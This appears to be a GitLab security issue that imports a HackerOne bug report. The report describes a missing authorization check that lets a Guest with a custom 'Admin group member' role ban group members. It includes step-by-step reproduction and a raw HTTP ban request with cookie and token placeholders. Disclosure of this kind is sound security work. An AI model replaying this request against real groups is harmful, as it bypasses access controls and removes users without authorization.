Skip to content

Guest with custom role `Admin group member` can ban users

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2431597 by ashish_r_padelkar on 2024-03-23, assigned to @kmorrison1:

Report | Attachments | How To Reproduce

Report

Summary

Hello,

As per this document https://docs.gitlab.com/ee/user/group/moderate_users.html#ban-a-user, you need to have owner role to ban a user from group.

However, it is possible for Guest user with custom role permission Admin group member to ban any user from the group using this issue.

A Owner see the below option but Guest user with custom role permission Admin group member cant see the option in UI which is expected but using backend request , we can perform this action because of missing permission check on the request.

Owner
Screenshot_2024-03-23_at_11.18.31_AM.png

**Guest user with Admin group member **
Screenshot_2024-03-23_at_11.18.22_AM.png

Steps to reproduce

1.As a group owner , Go to https://gitlab.com/groups/groupmarch2024/-/settings/roles_and_permissions and create a custom role of Guest user with Admin group member permission. Lets name this as GuestGroupAdmin.

2.Now go to https://gitlab.com/groups/groupmarch2024/-/group_members and add 2 members. UserA with GuestGroupAdmin and UserB with Maintainer role.

3.Now as a group owner, you see the option to ban both these users.

4.Login as UserA and go to https://gitlab.com/groups/groupmarch2024/-/group_members . You wont see ban option for users which is expected and working as per documentation.

5.Now grab your Cookie and authenticity_token (you can also use X-Csrf-Token value in this) in below request.

POST /groups/groupmarch2024/-/group_members/98201602/ban HTTP/2  
Host: gitlab.com  
Cookie: <Replace_Your_Cookie_Here>  
Content-Length: 117  
Cache-Control: max-age=0  
Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"  
Sec-Ch-Ua-Mobile: ?0  
Sec-Ch-Ua-Platform: "macOS"  
Upgrade-Insecure-Requests: 1  
Origin: https://gitlab.com  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: https://gitlab.com/groups/groupmarch2024/-/group_members  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

authenticity_token=<Replace_Your_token_Here>&_method=put

Where 98201602 is the ID of UserB here. You can get this ID in HTML response of https://gitlab.com/groups/groupmarch2024/-/group_members (View Source and look for data-members-data).

Send the request and you should see UserB is banned in group.

What is the current bug behavior?

Guest with Admin group member can ban user from the group that too for user having higher permissions.

What is the expected correct behavior?

Only group owner should be able to perform this as per documentation.

Output of checks

This bug happens on GitLab.com

Regards,
Ashish

Impact

Guest with custom role can ban users

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: